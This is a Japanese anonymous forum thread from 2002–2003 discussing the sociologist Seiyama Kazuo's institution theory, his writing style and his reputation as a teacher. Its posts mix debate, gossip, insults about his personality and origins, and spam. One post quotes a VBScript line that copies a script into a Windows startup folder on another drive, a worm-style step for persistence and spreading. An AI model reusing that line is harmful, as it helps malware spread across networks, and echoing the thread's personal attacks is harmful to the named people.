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●盛山和夫●

1 :制度論の構図:02/01/25 17:25
日本で最も優秀な社会学者、その全貌はいかなるものか。

2 :ぽち:02/01/25 17:27
大澤まさちとどっちが冴えてる?

3 :ほんと?:02/01/25 17:58
>>1

キング・カズが日本で最も優秀な社会学者だとはとても思えないのだけど、
あなたはなんでそう思ったのですか?

社会学界内部でも「キング・カズマンセー!」な人と「キング・カズ?だめジャン」という人と
二手に分かれているように思うのですけど。

『制度論の構図』は一部の社会学者に支持されているけど、あれのどこがいいのか
さっぱり分からないのです。二次理論って、結局お題目じゃないかと。

4 :ななしでぃょぅ:02/01/25 18:15
>>3

オリジナリティはないかもしれないけど、
いまのところ『制度論の構図』は秩序問題を扱った最も包括的な論文。
二次理論はその一部だけど、すべてじゃない。


5 :ほんと?:02/01/25 18:51
>>4

でもさぁ、前半部は先行業績の「お前達まるでだめジャン」的批判(というか難癖)だよね。
でもって、後半部の自説が、ちょっとイタいと思うんだ。初発仮説とか、二次理論とか。
モノの体系、記号の体系とか。

秩序問題を広く扱っているのは同意するけど、ただそれだけという気もする。
あの本のキモは一次理論/二次理論の概念化にあると思うけど、それがなぁ。
かといって先行業績の批判も、まあ中にはいいのもあるけど、難癖のようなものもあって。

6 :  :02/01/25 23:31
わかりやすい文章を書くところがいい。
宮台や大澤は、つまんないことをわざとまどろっこしく書く。(廣松渉の悪影響?)
盛山はそのわかりやすさで、つまらなさが際立っているだけ。損だねえ。

7 :ほんと?:02/01/25 23:34
>>6

わかりやすい、というのは同意します。確かに分かりやすい。
ただ、個人的には宮台も大澤も分かりやすいとまではいわないが、
言うほど晦渋な文章だとも思わないけど。

廣松渉の悪影響というのは、確かにあると思う。

8 :名無しさん:02/01/25 23:57
大澤の文章は、あそこまで芸が研ぎ澄まされてしまった結果、
社会思想を越えてギャグの域に達しているのではないか。
論座、早稲田文学、世界。どのエッセーも大澤自身のパロディに見える。
もはや俺は、大澤の新作に笑いを期待してしまっている。

9 : :02/01/26 00:05
ここで言ってるキング・カズは理論社会学者として、って話なの?
そもそもこの人理論面でマンセーなんて言ってる人がいるのかなあ

10 :ほんと?:02/01/26 00:07
>>9

数理の人を中心として、結構いると思うよ。

11 :ななしでぃょぅ:02/01/26 10:09
盛山って橋爪なんかと同世代だっけ。
橋爪に比べれば、はるかにいいと思う。





12 :ほんと?:02/01/26 15:03
〜よりもまし、とか、〜よりも文章分かりやすい、とかじゃなくて、
もっと盛山の議論自体に根ざした評価はないの?

あの方はどうもポストモダン的言説がお嫌いなようですが(脱構築とか特に)、
その割には代案を全く提示できていないように思えるのですが。



13 :ななしでぃょぅ:02/01/26 17:51
>>12

いまさらポストモダンもちあげてるほうが、よっぽど痛い。

14 :ななしでぃょぅ:02/01/26 17:52
議論自体に根ざした評価ねえ。
少し考えてみよう。

15 :ほんと?:02/01/26 18:00
>>13

確かに今時分ポストモダンを持ち上げているのはイタいですね。
ただ、氏の場合、ポストモダン以前に退行してしまっている
ような気がしないでもないのです。

16 :ななしでぃょぅ:02/01/26 18:19
そういえば、『制度論の構図』の最後の方で、
制度は理念的存在だからどうこうといってた。
あれは結局どういうことなのだろうか。

17 :ほんと?:02/01/26 18:33
>>16

理念的存在じゃなくて、理念的実在じゃなかたっけ?
自宅に本あるけど、また読むのめんどいな。両方あったかな。
あと、制度が理念的実在とかいうのって、本のはしがきから書かれてありますね

18 :  :02/01/27 00:12
『アステイオン』に載った「規範はいかに語られうるか」でのM.Weber評↓

「目的地の周辺をぐるぐる廻っているばかりのような文章」

ワラタ(ちなみに盛山氏はドイツ語苦手らしい)

19 :名無しさん:02/01/27 00:23
そんなにすごい人だったんだ。
わたし彼の授業退屈でしょうがなかったよ・・・
賢くなる努力しよう・・・

20 :18:02/01/27 00:33
訂正。
「目的地の周辺をぐるぐる廻ってばかりいるような文章」

21 :名無しさん:02/01/27 05:22
>>19
>わたし彼の授業退屈でしょうがなかったよ・・・
今もそうですが、何か?

22 :>17,18:02/01/28 16:14
理念的実在、というのは、矛盾している言い方に
みえるけど(理念=観念と実在をつないだ概念だから)、
結局、デュルケムの「社会的事実」にシュッツの現象学的
社会学をつないだ、ってところでしょう。

 合ってるかどうかは別にして、まったく新しい話とは
思えない。

23 : :02/01/28 20:41
社会学門外漢の漏れはスレッド見て
ソニーの「学歴無用論」書いた人かと思ったよ

24 :ななしでぃょぅ:02/01/28 20:52
>>22

いわんとするところは似たようなことかもしれないが、
それにしてはデュルケムは確かこきおろされてあった。
決定的な解決はあいも変わらず闇の中。
秩序問題を解くとはどういうことか。
それがいまいちはっきりしない、と繰り返し問いかけてあった。


25 :(・_・):02/01/28 23:07
>>22
バーガー&ルックマンのいってる制度概念と何か違いがあるの?

26 :  :02/01/28 23:29
なぜあんなに攻撃的なんですか?(w

27 :22:02/01/29 14:54
>>25
 >>25
 そんなに違いはないと思うけど、違うかな?

 ただ、せーやま先生は、ゲーム理論的数理社会学で
得点を挙げたり、機能主義的システム論が課題設定の
裏キャラになってる階層研究(SSM)の若頭をされたり
したから、つまりは、現象学的社会学とは全く知的
伝統が違うところからああいう結論に到る
プロセスが「ゆにーく」に見える、ってことでは?

 ちなみに、バーガーは、「資本主義革命が人びとを
シアワセにする」という、新保守主義のいでおろーぐを
やってきた人だけど、せいやま先生の共著論文にも、
いでおろーぐじゃないけど、似たような判断を示す
ものがあったような記憶があります。

28 :名無し:02/01/29 17:01
『権力』はどうよ?

29 :名無しさん:02/01/29 19:49
この人の本、読みやすいんだけど、記憶に残らない。
『権力』も読んだんだけどな。
宮台の予期理論が叩かれていたことしか覚えていない。

30 :nanasiology:02/01/29 22:56
『制度論の構図』
制度は人々の意味的秩序(一次理論)に基づいて構築されている理念的実在。
制度を行動主義的に位置付けるのは無理。
で、共同主観性は前提できないので、各人の抱いている制度の内容は違う可能性がある。
結局制度の研究方法としては、人々の一次理論をしらべるということで…。

とりあえずこんなもん?

31 :ななし:02/02/02 08:59
読書会あげ

32 :きんぐ:02/02/07 20:54
あげ

33 :庄司ガイキチ:02/02/07 23:22
つーか、そろそろ地球市民になろーよ。

34 :翻焼く:02/02/08 05:10
>>33
お前が首つって逝ったらな

35 :庄司コーキチ:02/02/08 16:38
ち、ち、ち、地球市民!!!

36 :  :02/02/08 17:30
盛山って翻訳してないから駄目

37 :奥さん・・・えへへへ:02/03/13 12:37
あげてしまおう

38 :きんぐ:02/04/13 23:58
業績への評価と人間性への評価は反比例するようですね。

39 : :02/04/23 19:16
130 :名無しさん@お腹いっぱい。 :02/04/23 13:53 ID:5IQZZk+b
これだけたたかれるとは、何とも徳のない人ですな


40 :38:02/04/29 07:58
確かに両方が高い人は少ない。
でも両方低い人はけっこういたりして。

41 : :02/04/29 13:59
「両方高い人」=宮島喬

合ってるでしょ?

42 :42:02/04/29 17:47
>>41
禿同。誰かとは違って生まれと育ちがいいのがすぐ分かる。
有徳の紳士というところだろうか。

43 : :02/04/29 22:47
盛山と宮島だったら、各としてはどちらが上なの?
やっぱ宮島?

44 :>>42:02/04/30 02:08
>誰かとは違って生まれと育ちがいいのがすぐ分かる。

盛山氏って、苦学して田舎から上京して(島根か鳥取、
どっちでもいいや)ようやく東大教授まで成り上がった
って感じがプンプンする。

 だから処世術として、「自分より弱い者を徹底的にイ
ジメる」というのが染みついてるみたい。実際、師匠の
トミケンを批判することはないよね。

45 :>>43:02/04/30 12:36
人格は今さらいうまでもないけど、学者としての格を比較するの
は難しいんじゃないかな。

ただ、宮島先生は「誰かとは違って」翻訳をたくさんしておられ
ますね。我々の勉強や研究は、彼の苦労の上に成り立っているこ
とは忘れちゃいけないと思う。数少ない心から尊敬できる学者だ。

46 :d:02/05/01 06:22
 宮島先生に会ってみたい。

47 : :02/05/04 00:03
本郷のロベスピエール。

48 :名無しプログラマ:02/05/04 02:02
>>44
たしか、鳥取だ。
どうでもいいが。


49 : :02/05/04 02:06
>>46
立教に行けばいいじゃんW
あそこは講師の布陣もいいし。

50 : :02/05/04 04:08
おかしいな。2ちゃんねるでの経験則によれば
そろそろ宮島が叩かれるころなのに。

背嫌魔ってのはそんなにヤな奴なの?

51 :q:02/05/04 13:50
↑ヤな奴ってのもあるし、ヒイキが激しい。
好きな弟子を必死でかばう。

52 :  :02/05/04 19:15
目をつぶる。舌打ちをする。顔をしかめる。最初から聞く気なし、というのが通常のパターン。

53 : :02/05/05 00:16
いまだにこんなに嫌われてるのか。人間いくつになっても変わらんね(W

54 : :02/06/04 05:41
−−−−−−−−−−−−−−−−−−−−−−−−−−
俺様用・しおり
  ∧_∧   
 ( ・∀・)< ここまで読んだ      
−−−−−−−−−−−−−−−−−−−−−−−−−−

55 : :02/06/07 22:21
あげ

56 : :02/06/14 00:52
 

57 :JSサイト発信!!:02/06/15 06:02
http://js-web.cside.com/index.html

58 : :02/06/16 15:04
>>51
好きな弟子ってだれ?

みなさんは、盛山さんと佐藤俊樹さんとの「中流崩壊」論争はどう思われました?

59 : :02/06/20 12:49
ワショショーイ!!

60 : :02/06/25 03:48
>>58
http://pe.kg/yahu/

61 :盛山和夫:02/07/01 06:33
僕は宮台くんは嫌いだな。というか実力をつけて欲しいといいたい。
僕の後任は西部スクールあたりのできる人になってもらうつもりだ。

62 :宮台くん:02/07/01 10:43
僕だってあんたなんか嫌いだよ〜。
この裸の王様がっ!

63 :     :02/07/07 01:04
933 :g056136.ppp.asahi-net.or.jp :02/07/06 22:18 ID:n966Eu6y
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"


64 : :02/09/24 19:54
「2ちゃんねる駄スレアワーの時間がやってまいりました。本日は駄スレ研究の第一人者、
 恩田擦次郎さんにスタジオにお越しいただきました」
「よろしくお願いします」
「さっそくですが恩田さん。このスレッドは駄スレとしてはどの程度のレベルでしょう?」
「そうですね。まあ、並み程度といったところでしょうか」
「ははあ、並みですか。その判定の基準は、一体どのようにおつけになるんですか?」
「ええ、私ども駄スレ愛好家の間では、三段階の基準があるんですよ。
 まず、私怨による誹謗中傷や個人情報の公開を行ったスレ…これを厨房スレといいます。
 削除対象になる最悪なスレですね。
 次に、このスレのようにつまらないネタで立ってしまったスレ。これを駄スレといいます。
 最後に、まったくレスがつかないままDAT落ちしたスレ。
 これは瞬殺スレッドと呼ばれ、愛好家の間で最も優秀な駄スレと言われています」
「レスがまったくつかないスレッドが優秀なんですか?」
「そうです。どんな駄スレでも大抵の場合は『2GET』『終了』『1の母です』等のレスがつきますからね。
 まったくレスがつかないままDAT落ちするのは、まさに至難の業なんですよ。
 目立たないタイトルに、当り障りのないテーマ、煽りやマジレスがつかない内容…
 微妙なバランスを保って、誰の目にもとまらずひっそりと下がっていく…まさに芸術です。
 最高峰は2ゲットすら付けさせないカメレオンのようなスレのことです」
「なるほど…駄スレひとつ取っても奥深い世界があるんですね。
 では、このスレッドの1は、瞬殺スレッドを作れる才能というのはありそうですか?」
「残念ながら難しそうですね…。見るからに自己中心的な内容で、名声欲が強そうですから、
 すぐに煽りレスがつくでしょうし、レスがつかなければ自作自演してしまうタイプですね」
「では最後に、ここの1にアドバイスをお願いします」
「人には向き不向きというのがあります。残念ながらあなたはネット活動には不向きです。
 周囲の反応をダイレクトに受けて喜びたいというあなたには…そうですね、
 発展途上国でのボランティア活動などが向いているんじゃないでしょうか?」
「ありがとうございました」


65 :  :02/09/25 00:19
盛山先生はとても誠実ないい先生だよ。
外部聴講だったけど、すごく丁寧に対応してもらいました。
感謝です。

66 : :02/10/02 16:17
盛山さんて伊原監督に似てない?

67 :山崎渉:03/01/17 17:14
(^^)

68 : :03/02/19 02:36
>>66
どっちの顔も知らん。

69 : :03/03/04 11:52
^ ^;

70 ::03/04/06 07:54
もりやまってよんでた。
ハズカシ

71 :山崎渉:03/04/17 09:30
(^^)

72 :山崎渉:03/04/20 04:43
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

73 : :03/05/21 09:47
「せいやま かずお」だもんね。

74 :ちんちん見せたい:03/05/21 10:16
ちんちん見せたい

75 :mik:03/05/21 21:24
あのー、せいやませんせいが、
あるこーむいんの論述試験つくるんですけど、
ヤマはるトコロとかあります?
去年は方法論的個人主義と集団主義、
おととしはゲマインからゲゼルへの変動でした。
当方、社会学をツケヤキ刃で学んでるものどす。
すみませぬが、どなたかお知恵を拝借できませぬか・・・





76 :H:03/05/21 21:38
( ^3^)/http://homepage3.nifty.com/coco-nut/\(^^\)


77 :山崎渉:03/05/21 21:43
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

78 :山崎渉:03/05/28 15:25
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

79 : :03/05/31 10:08
-o-

80 : :03/05/31 22:45
この人はウヨなの?
あとかずつち先生はお弟子さん? ケコーンできたの?

81 : :03/06/01 17:31
かずつち先生にちょとワラタ

82 :  :03/06/01 23:23
かぐつちのかみ【軻遇突智神・迦具土神】
(「かぐつち」の「かぐ」は「かがよう」の「かが」と同根で、光輝を意味する。「つ」は「の」、「ち」は神秘的な力を表わす)記紀にみえる火の神。火産霊神(ほむすびのかみ)。

Kokugo Dai Jiten Dictionary. Shinsou-ban (Revised edition) ゥ Shogakukan 1988/国語大辞典(新装版)ゥ小学館 1988

83 :山崎 渉:03/07/15 12:40

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

84 : :03/09/08 23:19
ageとくか

85 :pake:03/10/28 17:15
sageとくか

86 :iseyama:03/11/02 01:28
2年生歓迎age

87 :   :03/11/02 01:39
トミケンとかせー山って、俺はいい人だと思うけどな。
学問には純粋だし。

88 : :03/11/03 23:42
盛山先生、そうでしょうね。

89 : :03/11/09 23:36
よい人でせう。

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